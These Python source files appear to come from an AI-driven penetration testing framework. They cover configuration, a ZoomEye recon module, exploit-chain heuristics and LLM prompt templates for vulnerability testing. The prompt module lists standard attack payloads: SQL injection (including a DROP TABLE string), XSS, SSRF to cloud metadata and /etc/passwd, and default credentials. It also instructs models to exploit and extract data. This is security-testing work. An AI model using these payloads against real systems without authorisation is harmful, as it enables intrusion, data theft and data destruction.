            max_tokens: Approximate token limit

        Returns:
            Compact report string
        """
        findings = self.extract_all_findings(results)

        # Estimate ~5 tokens per finding line
        max_findings = max_tokens // 5

        lines = [f"FINDINGS ({len(findings)} total):"]

        # Add findings up to limit
        for finding in findings[:max_findings]:
            lines.append(finding.to_compact_string())

        if len(findings) > max_findings:
            lines.append(f"... and {len(findings) - max_findings} more")

        # Add chain analysis if room
        if max_tokens > 1500:
            chains = self._analyze_chains(findings[:20])
            if chains:
                lines.append("\nPOTENTIAL CHAINS:")
                for chain in chains[:5]:
                    lines.append(f"  {chain}")

        return "\n".join(lines)

    def _analyze_chains(self, findings: List[CompactFinding]) -> List[str]:
        """Analyze potential exploit chains from findings."""
        chains = []

        # Look for common chain patterns
        has_sqli = any(f.type == "sqli" for f in findings)
        has_auth_bypass = any("auth_bypass" in f.chain_potential for f in findings)
        has_ssrf = any("ssrf" in f.chain_potential for f in findings)
        has_lfi = any("lfi" in f.chain_potential for f in findings)

        if has_sqli and has_auth_bypass:
            chains.append("SQLI -> AUTH_BYPASS -> PRIV_ESC (confidence: 0.8)")

        if has_ssrf:
            internal_ports = [f for f in findings if f.type == "port" and f.severity in ["H", "M"]]
            if internal_ports:
                chains.append(f"SSRF -> INTERNAL_SCAN ({len(internal_ports)} targets) (confidence: 0.7)")

        if has_lfi:
            chains.append("LFI -> CONFIG_LEAK -> CRED_HARVEST (confidence: 0.6)")

        return chains



"""
AIPT Intelligence Tools - Passive Reconnaissance & Threat Intelligence

Provides integrations with intelligence platforms for passive reconnaissance:
- ZoomEye: Cyberspace search engine for discovering IPs, domains, and services
- Shodan: IoT and internet-connected device search (future)
- Censys: Internet-wide scanning data (future)
- VirusTotal: Malware and domain intelligence (future)

These tools gather information WITHOUT actively scanning the target.
"""

from aipt_v2.tools.intelligence.zoomeye_tool import (
    ZoomEyeTool,
    ZoomEyeConfig,
    ZoomEyeResult,
    ZoomEyeHost,
    get_zoomeye,
    zoomeye_search,
    zoomeye_domain_search,
    zoomeye_ip_search,
    zoomeye_org_search,
)

__all__ = [
    "ZoomEyeTool",
    "ZoomEyeConfig",
    "ZoomEyeResult",
    "ZoomEyeHost",
    "get_zoomeye",
    "zoomeye_search",
    "zoomeye_domain_search",
    "zoomeye_ip_search",
    "zoomeye_org_search",
]



"""
AIPT v2 Configuration Management
================================

Centralized configuration with validation using Pydantic.
Loads from environment variables with sensible defaults.
Also loads from ~/.aiptx/.env file created by the setup wizard.
"""

import os
from typing import List, Optional
from functools import lru_cache
from pathlib import Path

from dotenv import load_dotenv
from pydantic import BaseModel, Field, field_validator, model_validator
from pydantic_settings import BaseSettings

from .utils.logging import logger
from .utils.security import mask_path


def _load_config_files():
    """
    Load configuration from .env files.

    Priority (highest to lowest):
    1. Local .env file in current directory (highest - for project overrides)
    2. Global ~/.aiptx/.env file from setup wizard (user's main config)
    3. Environment variables already set in shell
    """
    # Load global config first with override=True since this is the user's
    # primary configuration from the setup wizard
    global_env = Path.home() / ".aiptx" / ".env"
    if global_env.exists():
        load_dotenv(global_env, override=True)

    # Load local .env file with override=True (highest priority for project-specific config)
    local_env = Path(".env")
    if local_env.exists():
        load_dotenv(local_env, override=True)


# Load config files on module import
_load_config_files()


class LLMSettings(BaseModel):
    """LLM provider configuration."""

    provider: str = Field(default="anthropic", description="LLM provider name")
    model: str = Field(default="claude-3-7-sonnet-20250219", description="Model identifier")
    api_key: Optional[str] = Field(default=None, description="API key")
    api_base: Optional[str] = Field(default=None, description="Custom API base URL")
    timeout: int = Field(default=120, ge=10, le=600, description="Request timeout in seconds")
    max_tokens: int = Field(default=4096, ge=100, le=128000, description="Max response tokens")
    temperature: float = Field(default=0.7, ge=0.0, le=2.0, description="Sampling temperature")
    enable_caching: bool = Field(default=True, description="Enable prompt caching")

    @field_validator("provider", mode="before")
    @classmethod
    def get_provider_from_env(cls, v):
        """Load provider from environment variable if not explicitly set."""
        if v and v != "anthropic":  # Only use env if no explicit value or default
            return v
        # Check environment variables (setup wizard saves to AIPT_LLM__PROVIDER)
        env_provider = os.getenv("AIPT_LLM__PROVIDER") or os.getenv("AIPT_LLM_PROVIDER")
        if env_provider:
            return env_provider
        return v or "anthropic"

    @field_validator("model", mode="before")
    @classmethod
    def get_model_from_env(cls, v):
        """Load model from environment variable if not explicitly set."""
        if v and v != "claude-3-7-sonnet-20250219":  # Only use env if no explicit value or default
            return v
        # Check environment variables (setup wizard saves to AIPT_LLM__MODEL)
        env_model = os.getenv("AIPT_LLM__MODEL") or os.getenv("AIPT_LLM_MODEL")
        if env_model:
            return env_model
        return v or "claude-3-7-sonnet-20250219"

    @field_validator("api_key", mode="before")
    @classmethod
    def get_api_key_from_env(cls, v):
        if v:
            return v
        # Try common environment variables
        for key in ["ANTHROPIC_API_KEY", "OPENAI_API_KEY", "DEEPSEEK_API_KEY", "LLM_API_KEY"]:
            if os.getenv(key):
                return os.getenv(key)
        return None

    @field_validator("api_base", mode="before")
    @classmethod
    def get_api_base_from_env(cls, v):
        """Load API base URL from environment, with Ollama-specific handling."""
        if v:
            return v
        # Check environment variables in order of priority
        for key in [
            "AIPT_LLM__OLLAMA_BASE_URL",  # Setup wizard Ollama config
            "AIPT_LLM__API_BASE",           # Generic AIPT config
            "LLM_API_BASE",                 # LiteLLM generic
            "OPENAI_API_BASE",              # OpenAI-compatible
            "LITELLM_BASE_URL",             # LiteLLM explicit
            "OLLAMA_API_BASE",              # Ollama specific
        ]:
            if os.getenv(key):
                return os.getenv(key)
        return None


class ScannerSettings(BaseModel):
    """Enterprise scanner configuration."""

    # Acunetix
    acunetix_url: Optional[str] = Field(default=None, description="Acunetix API URL")
    acunetix_api_key: Optional[str] = Field(default=None, description="Acunetix API key")

    # Burp Suite
    burp_url: Optional[str] = Field(default=None, description="Burp Suite API URL")
    burp_api_key: Optional[str] = Field(default=None, description="Burp Suite API key")

    # Nessus
    nessus_url: Optional[str] = Field(default=None, description="Nessus API URL")
    nessus_access_key: Optional[str] = Field(default=None, description="Nessus access key")
    nessus_secret_key: Optional[str] = Field(default=None, description="Nessus secret key")

    # OWASP ZAP
    zap_url: Optional[str] = Field(default=None, description="ZAP API URL")
    zap_api_key: Optional[str] = Field(default=None, description="ZAP API key")

    @field_validator("acunetix_url", "burp_url", "nessus_url", "zap_url", mode="before")
    @classmethod
    def validate_url(cls, v):
        if v and not v.startswith(("http://", "https://")):
            # Auto-prepend http:// if no scheme provided (user-friendly)
            v = f"http://{v}"
        return v


class IntelligenceSettings(BaseModel):
    """Passive reconnaissance and threat intelligence configuration."""

    # ZoomEye - Cyberspace search engine
    zoomeye_api_key: Optional[str] = Field(default=None, description="ZoomEye API key")

    # Shodan (future)
    shodan_api_key: Optional[str] = Field(default=None, description="Shodan API key")

    # Censys (future)
    censys_api_id: Optional[str] = Field(default=None, description="Censys API ID")
    censys_api_secret: Optional[str] = Field(default=None, description="Censys API Secret")

    # VirusTotal (future)
    virustotal_api_key: Optional[str] = Field(default=None, description="VirusTotal API key")

    @field_validator("zoomeye_api_key", mode="before")
    @classmethod
    def get_zoomeye_key_from_env(cls, v):
        if v:
            return v
        return os.getenv("ZOOMEYE_API_KEY")

    @field_validator("shodan_api_key", mode="before")
    @classmethod
    def get_shodan_key_from_env(cls, v):
        if v:
            return v
        return os.getenv("SHODAN_API_KEY")


class VPSSettings(BaseModel):
    """VPS execution configuration."""

    host: Optional[str] = Field(default=None, description="VPS hostname or IP")
    user: str = Field(default="ubuntu", description="SSH username")
    key_path: Optional[str] = Field(default=None, description="Path to SSH private key")
    port: int = Field(default=22, ge=1, le=65535, description="SSH port")
    # Security: Use /var/tmp for longer-lived temp files (survives reboots)
    # The directory should be created with restricted permissions (700) on the VPS
    results_dir: str = Field(
        default="/var/tmp/aipt_results",
        description="Remote results directory (should be created with mode 700)"
    )
    timeout: int = Field(default=300, ge=30, le=3600, description="Command timeout in seconds")

    @field_validator("key_path", mode="before")
    @classmethod
    def expand_key_path(cls, v):
        if v:
            return str(Path(v).expanduser().resolve())
        return v


class APISettings(BaseModel):
    """REST API configuration."""

    # Security: Default to localhost to avoid accidental exposure (CWE-605)
    # Use AIPT_API__HOST=0.0.0.0 for production deployments behind a reverse proxy
    host: str = Field(default="127.0.0.1", description="API host (use 0.0.0.0 for network access)")
    port: int = Field(default=8000, ge=1, le=65535, description="API port")
    cors_origins: List[str] = Field(
        default=["http://localhost:3000"],
        description="Allowed CORS origins"
    )
    rate_limit: str = Field(default="100/minute", description="Rate limit per client")
    enable_docs: bool = Field(default=True, description="Enable Swagger/OpenAPI docs")


class DatabaseSettings(BaseModel):
    """Database configuration."""

    url: str = Field(default="sqlite:///./aipt.db", description="Database connection URL")
    echo: bool = Field(default=False, description="Echo SQL queries")
    pool_size: int = Field(default=5, ge=1, le=100, description="Connection pool size")


class LoggingSettings(BaseModel):
    """Logging configuration."""

    level: str = Field(default="INFO", description="Log level")
    format: str = Field(default="console", description="Log format (console or json)")
    redact_secrets: bool = Field(default=True, description="Redact sensitive values in logs")


class OfflineSettings(BaseModel):
    """Offline mode configuration for air-gapped operation."""

    enabled: bool = Field(default=False, description="Enable offline mode")
    data_path: Path = Field(
        default_factory=lambda: Path.home() / ".aiptx" / "data",
        description="Path to offline data storage"
    )
    wordlist_path: Optional[Path] = Field(default=None, description="Path to wordlists")
    template_path: Optional[Path] = Field(default=None, description="Path to nuclei templates")
    auto_update_when_online: bool = Field(default=True, description="Auto-update data when online")
    update_interval_days: int = Field(default=7, ge=1, description="Days between updates")

    @field_validator("data_path", mode="before")
    @classmethod
    def expand_data_path(cls, v):
        if v:
            return Path(v).expanduser().resolve()
        return Path.home() / ".aiptx" / "data"


class AICheckpointSettings(BaseModel):
    """AI checkpoint configuration for local LLM analysis between phases."""

    enabled: bool = Field(default=True, description="Enable AI checkpoints")
    ollama_base_url: str = Field(
        default="http://localhost:11434",
        description="Ollama API base URL"
    )

    # Model configuration per checkpoint type
    post_recon_model: str = Field(
        default="mistral:7b",
        description="Model for post-recon analysis"
    )
    post_scan_model: str = Field(
        default="deepseek-coder:6.7b",
        description="Model for post-scan vulnerability analysis"
    )
    post_exploit_model: str = Field(
        default="mistral:7b",
        description="Model for post-exploit strategy decisions"
    )

    # Context management
    max_context_tokens: int = Field(
        default=8192,
        ge=1024,
        le=131072,
        description="Maximum tokens for LLM context"
    )
    response_timeout: int = Field(
        default=300,
        ge=30,
        le=3600,
        description="Timeout for LLM response in seconds"
    )

    # Streaming and UI
    enable_streaming: bool = Field(
        default=True,
        description="Stream tokens for progress feedback"
    )
    show_reasoning: bool = Field(
        default=True,
        description="Show LLM reasoning in output"
    )

    # Fallback behavior
    fallback_to_rules: bool = Field(
        default=True,
        description="Use rule-based analysis if LLM unavailable"
    )

    @field_validator("ollama_base_url", mode="before")
    @classmethod
    def get_ollama_url_from_env(cls, v):
        if v:
            return v
        return os.getenv("OLLAMA_API_BASE") or os.getenv("AIPT_CHECKPOINT__OLLAMA_URL", "http://localhost:11434")


class AIPTConfig(BaseSettings):
    """
    Main AIPT v2 configuration.

    Loads from environment variables with AIPT_ prefix.
    """

    # Sub-configurations
    llm: LLMSettings = Field(default_factory=LLMSettings)
    scanners: ScannerSettings = Field(default_factory=ScannerSettings)
    intelligence: IntelligenceSettings = Field(default_factory=IntelligenceSettings)
    vps: VPSSettings = Field(default_factory=VPSSettings)
    api: APISettings = Field(default_factory=APISettings)
    database: DatabaseSettings = Field(default_factory=DatabaseSettings)
    logging: LoggingSettings = Field(default_factory=LoggingSettings)
    offline: OfflineSettings = Field(default_factory=OfflineSettings)
    ai_checkpoints: AICheckpointSettings = Field(default_factory=AICheckpointSettings)

    # General settings
    sandbox_mode: bool = Field(default=False, description="Run tools in sandbox")
    output_dir: Path = Field(default=Path("./results"), description="Output directory")
    reports_dir: Path = Field(default=Path("./reports"), description="Reports directory")

    model_config = {
        "env_prefix": "AIPT_",
        "env_nested_delimiter": "__",
        "case_sensitive": False,
    }

    @model_validator(mode="after")
    def create_directories(self):
        """Ensure output directories exist."""
        self.output_dir.mkdir(parents=True, exist_ok=True)
        self.reports_dir.mkdir(parents=True, exist_ok=True)
        return self


@lru_cache(maxsize=1)
def get_config() -> AIPTConfig:
    """
    Get the global configuration instance.

    Returns:
        AIPTConfig instance loaded from environment
    """
    # Load from environment
    # Note: Setup wizard saves with AIPT_ prefix and __ delimiter (e.g., AIPT_LLM__PROVIDER)
    # We check both formats for backwards compatibility
    # Determine API base URL with provider-specific handling
    llm_provider = os.getenv("AIPT_LLM__PROVIDER") or os.getenv("AIPT_LLM_PROVIDER", "anthropic")
    llm_api_base = (
        os.getenv("AIPT_LLM__OLLAMA_BASE_URL")  # Ollama from setup wizard
        or os.getenv("AIPT_LLM__API_BASE")       # Generic AIPT config
        or os.getenv("LLM_API_BASE")             # LiteLLM generic
        or os.getenv("OPENAI_API_BASE")          # OpenAI-compatible
        or os.getenv("OLLAMA_API_BASE")          # Ollama specific
    )

    # Auto-set Ollama base URL if provider is ollama and no base URL configured
    if llm_provider.lower() == "ollama" and not llm_api_base:
        llm_api_base = "http://localhost:11434"

    config = AIPTConfig(
        llm=LLMSettings(
            provider=llm_provider,
            model=os.getenv("AIPT_LLM__MODEL") or os.getenv("AIPT_LLM_MODEL", "claude-3-7-sonnet-20250219"),
            api_key=os.getenv("ANTHROPIC_API_KEY") or os.getenv("OPENAI_API_KEY") or os.getenv("DEEPSEEK_API_KEY") or os.getenv("LLM_API_KEY"),
            api_base=llm_api_base,
            timeout=int(os.getenv("AIPT_LLM__TIMEOUT") or os.getenv("AIPT_LLM_TIMEOUT", "120")),
        ),
        scanners=ScannerSettings(
            acunetix_url=os.getenv("AIPT_SCANNERS__ACUNETIX_URL") or os.getenv("ACUNETIX_URL"),
            acunetix_api_key=os.getenv("AIPT_SCANNERS__ACUNETIX_API_KEY") or os.getenv("ACUNETIX_API_KEY"),
            burp_url=os.getenv("AIPT_SCANNERS__BURP_URL") or os.getenv("BURP_URL"),
            burp_api_key=os.getenv("AIPT_SCANNERS__BURP_API_KEY") or os.getenv("BURP_API_KEY"),
            nessus_url=os.getenv("AIPT_SCANNERS__NESSUS_URL") or os.getenv("NESSUS_URL"),
            nessus_access_key=os.getenv("AIPT_SCANNERS__NESSUS_ACCESS_KEY") or os.getenv("NESSUS_ACCESS_KEY"),
            nessus_secret_key=os.getenv("AIPT_SCANNERS__NESSUS_SECRET_KEY") or os.getenv("NESSUS_SECRET_KEY"),
            zap_url=os.getenv("AIPT_SCANNERS__ZAP_URL") or os.getenv("ZAP_URL"),
            zap_api_key=os.getenv("AIPT_SCANNERS__ZAP_API_KEY") or os.getenv("ZAP_API_KEY"),
        ),
        intelligence=IntelligenceSettings(
            zoomeye_api_key=os.getenv("AIPT_INTELLIGENCE__ZOOMEYE_API_KEY") or os.getenv("ZOOMEYE_API_KEY"),
            shodan_api_key=os.getenv("AIPT_INTELLIGENCE__SHODAN_API_KEY") or os.getenv("SHODAN_API_KEY"),
            censys_api_id=os.getenv("AIPT_INTELLIGENCE__CENSYS_API_ID") or os.getenv("CENSYS_API_ID"),
            censys_api_secret=os.getenv("AIPT_INTELLIGENCE__CENSYS_API_SECRET") or os.getenv("CENSYS_API_SECRET"),
            virustotal_api_key=os.getenv("AIPT_INTELLIGENCE__VIRUSTOTAL_API_KEY") or os.getenv("VIRUSTOTAL_API_KEY"),
        ),
        vps=VPSSettings(
            host=os.getenv("AIPT_VPS__HOST") or os.getenv("VPS_HOST"),
            user=os.getenv("AIPT_VPS__USER") or os.getenv("VPS_USER", "ubuntu"),
            key_path=os.getenv("AIPT_VPS__KEY_PATH") or os.getenv("VPS_KEY"),
        ),
        api=APISettings(
            cors_origins=os.getenv("AIPT_CORS_ORIGINS", "http://localhost:3000").split(","),
            rate_limit=os.getenv("AIPT_RATE_LIMIT", "100/minute"),
        ),
        database=DatabaseSettings(
            url=os.getenv("DATABASE_URL", "sqlite:///./aipt.db"),
        ),
        logging=LoggingSettings(
            level=os.getenv("AIPT_LOG_LEVEL", "WARNING"),  # Default to WARNING for cleaner output
            format=os.getenv("AIPT_LOG_FORMAT", "console"),
        ),
        offline=OfflineSettings(
            enabled=os.getenv("AIPT_OFFLINE__ENABLED", "false").lower() == "true",
            data_path=Path(os.getenv("AIPT_OFFLINE__DATA_PATH", str(Path.home() / ".aiptx" / "data"))),
            auto_update_when_online=os.getenv("AIPT_OFFLINE__AUTO_UPDATE", "true").lower() == "true",
            update_interval_days=int(os.getenv("AIPT_OFFLINE__UPDATE_INTERVAL", "7")),
        ),
        ai_checkpoints=AICheckpointSettings(
            enabled=os.getenv("AIPT_CHECKPOINT__ENABLED", "true").lower() == "true",
            ollama_base_url=os.getenv("AIPT_CHECKPOINT__OLLAMA_URL") or os.getenv("OLLAMA_API_BASE", "http://localhost:11434"),
            post_recon_model=os.getenv("AIPT_CHECKPOINT__POST_RECON_MODEL", "mistral:7b"),
            post_scan_model=os.getenv("AIPT_CHECKPOINT__POST_SCAN_MODEL", "deepseek-coder:6.7b"),
            post_exploit_model=os.getenv("AIPT_CHECKPOINT__POST_EXPLOIT_MODEL", "mistral:7b"),
            max_context_tokens=int(os.getenv("AIPT_CHECKPOINT__MAX_CONTEXT", "8192")),
            response_timeout=int(os.getenv("AIPT_CHECKPOINT__TIMEOUT", "300")),
            enable_streaming=os.getenv("AIPT_CHECKPOINT__STREAMING", "true").lower() == "true",
            fallback_to_rules=os.getenv("AIPT_CHECKPOINT__FALLBACK_RULES", "true").lower() == "true",
        ),
        sandbox_mode=os.getenv("AIPT_SANDBOX_MODE", "false").lower() == "true",
    )

    # Only log configuration details at DEBUG level for cleaner default output
    logger.debug(
        "Configuration loaded",
        llm_provider=config.llm.provider,
        llm_model=config.llm.model,
        has_llm_key=bool(config.llm.api_key),
        has_acunetix=bool(config.scanners.acunetix_url),
        has_burp=bool(config.scanners.burp_url),
        has_nessus=bool(config.scanners.nessus_url),
        has_zoomeye=bool(config.intelligence.zoomeye_api_key),
        has_vps=bool(config.vps.host),
        sandbox_mode=config.sandbox_mode,
        offline_mode=config.offline.enabled,
        ai_checkpoints=config.ai_checkpoints.enabled,
    )

    return config


def reload_config() -> AIPTConfig:
    """
    Reload configuration from files and environment.

    This clears the cached config and reloads from:
    - ~/.aiptx/.env (setup wizard config)
    - ./.env (local project config)
    - Environment variables

    Useful after running the setup wizard.

    Returns:
        Fresh AIPTConfig instance
    """
    # Clear the cached config
    get_config.cache_clear()

    # Reload .env files
    _load_config_files()

    # Return fresh config
    return get_config()


def validate_config_for_features(features: List[str]) -> List[str]:
    """
    Validate that required configuration is present for requested features.

    Args:
        features: List of feature names to validate

    Returns:
        List of error messages (empty if all valid)
    """
    config = get_config()
    errors = []

    if "llm" in features and not config.llm.api_key:
        errors.append(
            "LLM API key required. Set ANTHROPIC_API_KEY or OPENAI_API_KEY environment variable."
        )

    if "acunetix" in features:
        if not config.scanners.acunetix_url:
            errors.append("Acunetix URL required. Set ACUNETIX_URL environment variable.")
        if not config.scanners.acunetix_api_key:
            errors.append("Acunetix API key required. Set ACUNETIX_API_KEY environment variable.")

    if "burp" in features:
        if not config.scanners.burp_url:
            errors.append("Burp Suite URL required. Set BURP_URL environment variable.")
        if not config.scanners.burp_api_key:
            errors.append("Burp Suite API key required. Set BURP_API_KEY environment variable.")

    if "nessus" in features:
        if not config.scanners.nessus_url:
            errors.append("Nessus URL required. Set NESSUS_URL environment variable.")
        if not config.scanners.nessus_access_key:
            errors.append("Nessus access key required. Set NESSUS_ACCESS_KEY environment variable.")
        if not config.scanners.nessus_secret_key:
            errors.append("Nessus secret key required. Set NESSUS_SECRET_KEY environment variable.")

    if "zoomeye" in features:
        if not config.intelligence.zoomeye_api_key:
            errors.append(
                "ZoomEye API key required. Set ZOOMEYE_API_KEY environment variable. "
                "Get your key from https://www.zoomeye.ai profile."
            )

    if "vps" in features:
        if not config.vps.host:
            errors.append("VPS host required. Set VPS_HOST environment variable.")
        if not config.vps.key_path:
            errors.append("VPS SSH key path required. Set VPS_KEY environment variable.")
        elif not Path(config.vps.key_path).exists():
            # Mask the path to avoid exposing full filesystem structure
            errors.append(f"VPS SSH key not found: {mask_path(config.vps.key_path)}")

    return errors


# Convenience function
def require_config(*features: str) -> AIPTConfig:
    """
    Get config and raise if required features are not configured.

    Args:
        *features: Feature names to validate

    Returns:
        AIPTConfig instance

    Raises:
        ValueError: If required configuration is missing
    """
    errors = validate_config_for_features(list(features))
    if errors:
        raise ValueError("Configuration errors:\n" + "\n".join(f"  - {e}" for e in errors))
    return get_config()



"""
Security Skill Prompts Module
=============================

Jinja2-based prompt templates for AI security testing.
Includes vulnerability-specific expertise prompts and testing methodologies.
"""

from pathlib import Path
from typing import Dict, List, Optional, Any
from dataclasses import dataclass, field
import json

from jinja2 import Environment, FileSystemLoader, select_autoescape


@dataclass
class VulnerabilityPrompt:
    """A vulnerability-specific testing prompt."""
    id: str
    name: str
    category: str
    description: str
    owasp_category: str
    cwe_ids: List[str]
    testing_techniques: List[str]
    payloads: List[str]
    detection_patterns: List[str]
    system_prompt: str
    user_prompt_template: str


# Comprehensive vulnerability prompts covering OWASP Top 10 and beyond
VULNERABILITY_PROMPTS: Dict[str, VulnerabilityPrompt] = {}


def _register_vuln_prompt(prompt: VulnerabilityPrompt) -> None:
    """Register a vulnerability prompt."""
    VULNERABILITY_PROMPTS[prompt.id] = prompt


# SQL Injection Expert
_register_vuln_prompt(VulnerabilityPrompt(
    id="sqli",
    name="SQL Injection",
    category="injection",
    description="Test for SQL injection vulnerabilities in all input vectors",
    owasp_category="A03:2021-Injection",
    cwe_ids=["CWE-89", "CWE-564"],
    testing_techniques=[
        "Error-based SQLi", "Union-based SQLi", "Blind boolean SQLi",
        "Time-based blind SQLi", "Out-of-band SQLi", "Second-order SQLi"
    ],
    payloads=[
        "' OR '1'='1", "'; DROP TABLE--", "1' AND '1'='1",
        "' UNION SELECT NULL--", "1; WAITFOR DELAY '0:0:5'--",
        "' OR SLEEP(5)#", "1' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--"
    ],
    detection_patterns=[
        "SQL syntax error", "mysql_fetch", "ORA-", "PostgreSQL",
        "SQLite", "JDBC", "ODBC", "unclosed quotation"
    ],
    system_prompt="""You are an expert SQL injection penetration tester. Your mission is to discover and exploit SQL injection vulnerabilities in the target application.

EXPERTISE:
- In-band SQLi (Error-based, Union-based)
- Blind SQLi (Boolean-based, Time-based)
- Out-of-band SQLi (DNS, HTTP exfiltration)
- Second-order SQLi
- Database fingerprinting (MySQL, PostgreSQL, MSSQL, Oracle, SQLite)
- WAF bypass techniques

METHODOLOGY:
1. Identify all input vectors (GET/POST params, headers, cookies, JSON/XML bodies)
2. Test each input with basic SQLi payloads
3. Analyze error messages for database fingerprinting
4. Escalate to advanced payloads based on database type
5. Attempt data extraction if vulnerability confirmed
6. Document all findings with evidence

OUTPUT FORMAT:
When you find a vulnerability, report it as:
<finding>
<title>SQL Injection in [location]</title>
<severity>critical|high|medium</severity>
<description>Detailed description of the vulnerability</description>
<evidence>The exact payload and response that confirms the vulnerability</evidence>
<location>URL/endpoint/parameter affected</location>
<remediation>How to fix this vulnerability</remediation>
<cwe>CWE-89</cwe>
</finding>

Be thorough and test systematically. Do not stop until all input vectors have been tested.""",
    user_prompt_template="Test {{ target }} for SQL injection vulnerabilities. Focus on {{ focus_area if focus_area else 'all input vectors' }}."
))


# Cross-Site Scripting Expert
_register_vuln_prompt(VulnerabilityPrompt(
    id="xss",
    name="Cross-Site Scripting",
    category="injection",
    description="Test for XSS vulnerabilities including reflected, stored, and DOM-based",
    owasp_category="A03:2021-Injection",
    cwe_ids=["CWE-79", "CWE-80"],
    testing_techniques=[
        "Reflected XSS", "Stored XSS", "DOM-based XSS",
        "Mutation XSS", "Blind XSS", "Self-XSS to escalation"
    ],
    payloads=[
        "<script>alert(1)</script>", "<img src=x onerror=alert(1)>",
        "<svg onload=alert(1)>", "javascript:alert(1)", "'-alert(1)-'",
        "<details open ontoggle=alert(1)>", "{{constructor.constructor('alert(1)')()}}"
    ],
    detection_patterns=[
        "reflected in response", "script execution", "event handler triggered",
        "DOM manipulation", "innerHTML", "document.write"
    ],
    system_prompt="""You are an expert XSS penetration tester specializing in discovering Cross-Site Scripting vulnerabilities.

EXPERTISE:
- Reflected XSS (GET/POST parameters, headers, URL fragments)
- Stored XSS (comments, profiles, messages, file uploads)
- DOM-based XSS (document.location, window.name, localStorage)
- Mutation XSS (browser parsing quirks)
- CSP bypass techniques
- Filter evasion and encoding tricks

METHODOLOGY:
1. Map all reflection points in the application
2. Test basic XSS payloads to understand filtering
3. Analyze the context (HTML, attribute, JavaScript, URL)
4. Craft context-specific payloads
5. Attempt CSP bypass if present
6. Test for stored XSS in persistent data
7. Check for DOM-based XSS in JavaScript code

OUTPUT FORMAT:
When you find a vulnerability, report it as:
<finding>
<title>XSS Vulnerability in [location]</title>
<severity>high|medium</severity>
<description>Type of XSS and how it can be exploited</description>
<evidence>The payload that executed and proof of execution</evidence>
<location>URL/endpoint/parameter affected</location>
<remediation>Specific fix recommendations</remediation>
<cwe>CWE-79</cwe>
</finding>

Test all input vectors systematically. Consider encoding bypass techniques.""",
    user_prompt_template="Test {{ target }} for XSS vulnerabilities. Focus on {{ focus_area if focus_area else 'all reflection points' }}."
))


# Broken Access Control Expert
_register_vuln_prompt(VulnerabilityPrompt(
    id="idor",
    name="Insecure Direct Object Reference",
    category="access_control",
    description="Test for IDOR and broken access control vulnerabilities",
    owasp_category="A01:2021-Broken-Access-Control",
    cwe_ids=["CWE-639", "CWE-284", "CWE-285"],
    testing_techniques=[
        "Horizontal privilege escalation", "Vertical privilege escalation",
        "Parameter tampering", "Forced browsing", "API endpoint enumeration"
    ],
    payloads=[
        "Change user ID in request", "Modify object reference",
        "Access other users' resources", "Skip authorization checks"
    ],
    detection_patterns=[
        "Different user data returned", "Access granted without authorization",
        "Resource belonging to other user", "Missing access control"
    ],
    system_prompt="""You are an expert in discovering Broken Access Control and IDOR vulnerabilities.

EXPERTISE:
- Horizontal Privilege Escalation (accessing other users' data)
- Vertical Privilege Escalation (accessing admin functions)
- IDOR (Insecure Direct Object References)
- Forced browsing to restricted resources
- JWT manipulation and session attacks
- API authorization bypass

METHODOLOGY:
1. Identify all endpoints that reference user-specific resources
2. Map the authorization model (what should be protected)
3. Test accessing resources with different user contexts
4. Try modifying IDs, UUIDs, and object references
5. Test parameter pollution and mass assignment
6. Check for missing function-level access control
7. Test API endpoints for authorization bypass

OUTPUT FORMAT:
When you find a vulnerability, report it as:
<finding>
<title>IDOR/Access Control in [location]</title>
<severity>critical|high|medium</severity>
<description>What unauthorized access was achieved</description>
<evidence>Steps to reproduce with before/after states</evidence>
<location>Endpoint and parameters involved</location>
<remediation>Proper access control implementation</remediation>
<cwe>CWE-639</cwe>
</finding>

Test with multiple user roles and contexts.""",
    user_prompt_template="Test {{ target }} for IDOR and broken access control. {{ 'User credentials: ' + credentials if credentials else '' }}"
))


# Authentication Bypass Expert
_register_vuln_prompt(VulnerabilityPrompt(
    id="auth",
    name="Authentication Bypass",
    category="authentication",
    description="Test for authentication vulnerabilities and bypass techniques",
    owasp_category="A07:2021-Auth-Failures",
    cwe_ids=["CWE-287", "CWE-288", "CWE-306"],
    testing_techniques=[
        "Credential stuffing", "Brute force", "Password reset flaws",
        "Session fixation", "JWT attacks", "OAuth/OIDC flaws"
    ],
    payloads=[
        "admin:admin", "test:test", "user:password", "admin:password123"
    ],
    detection_patterns=[
        "Login successful", "Session created", "JWT token issued",
        "Password reset sent", "Account unlocked"
    ],
    system_prompt="""You are an expert in authentication security testing.

EXPERTISE:
- Credential testing and default passwords
- Multi-factor authentication bypass
- Password reset vulnerabilities
- Session management flaws
- JWT vulnerabilities (none algorithm, key confusion, claim tampering)
- OAuth/OIDC implementation flaws
- Account enumeration
- Rate limiting bypass

METHODOLOGY:
1. Enumerate authentication endpoints
2. Test for default/weak credentials
3. Analyze session token generation
4. Test password reset flow for vulnerabilities
5. Check JWT implementation if used
6. Test for account enumeration
7. Verify rate limiting and account lockout

OUTPUT FORMAT:
When you find a vulnerability, report it as:
<finding>
<title>Authentication Vulnerability: [type]</title>
<severity>critical|high|medium</severity>
<description>How the authentication can be bypassed</description>
<evidence>Steps to reproduce the bypass</evidence>
<location>Authentication endpoint affected</location>
<remediation>Secure authentication implementation</remediation>
<cwe>CWE-287</cwe>
</finding>

Be thorough but avoid causing account lockouts in production.""",
    user_prompt_template="Test authentication security on {{ target }}. {{ 'Test credentials: ' + credentials if credentials else '' }}"
))


# Server-Side Request Forgery Expert
_register_vuln_prompt(VulnerabilityPrompt(
    id="ssrf",
    name="Server-Side Request Forgery",
    category="injection",
    description="Test for SSRF vulnerabilities to access internal resources",
    owasp_category="A10:2021-SSRF",
    cwe_ids=["CWE-918"],
    testing_techniques=[
        "Basic SSRF", "Blind SSRF", "SSRF via DNS rebinding",
        "SSRF to cloud metadata", "SSRF protocol smuggling"
    ],
    payloads=[
        "http://127.0.0.1", "http://localhost", "http://169.254.169.254",
        "http://[::1]", "http://0.0.0.0", "file:///etc/passwd",
        "http://metadata.google.internal", "http://instance-data"
    ],
    detection_patterns=[
        "Internal response returned", "Cloud metadata accessed",
        "Local file read", "Internal port scan results"
    ],
    system_prompt="""You are an expert SSRF penetration tester.

EXPERTISE:
- Basic SSRF exploitation
- Blind SSRF detection via out-of-band callbacks
- Cloud metadata service access (AWS, GCP, Azure)
- Internal network scanning via SSRF
- Protocol smuggling (gopher, dict, file)
- SSRF filter bypass techniques

METHODOLOGY:
1. Identify all URL input parameters
2. Test for basic SSRF with localhost/127.0.0.1
3. Attempt cloud metadata access if cloud-hosted
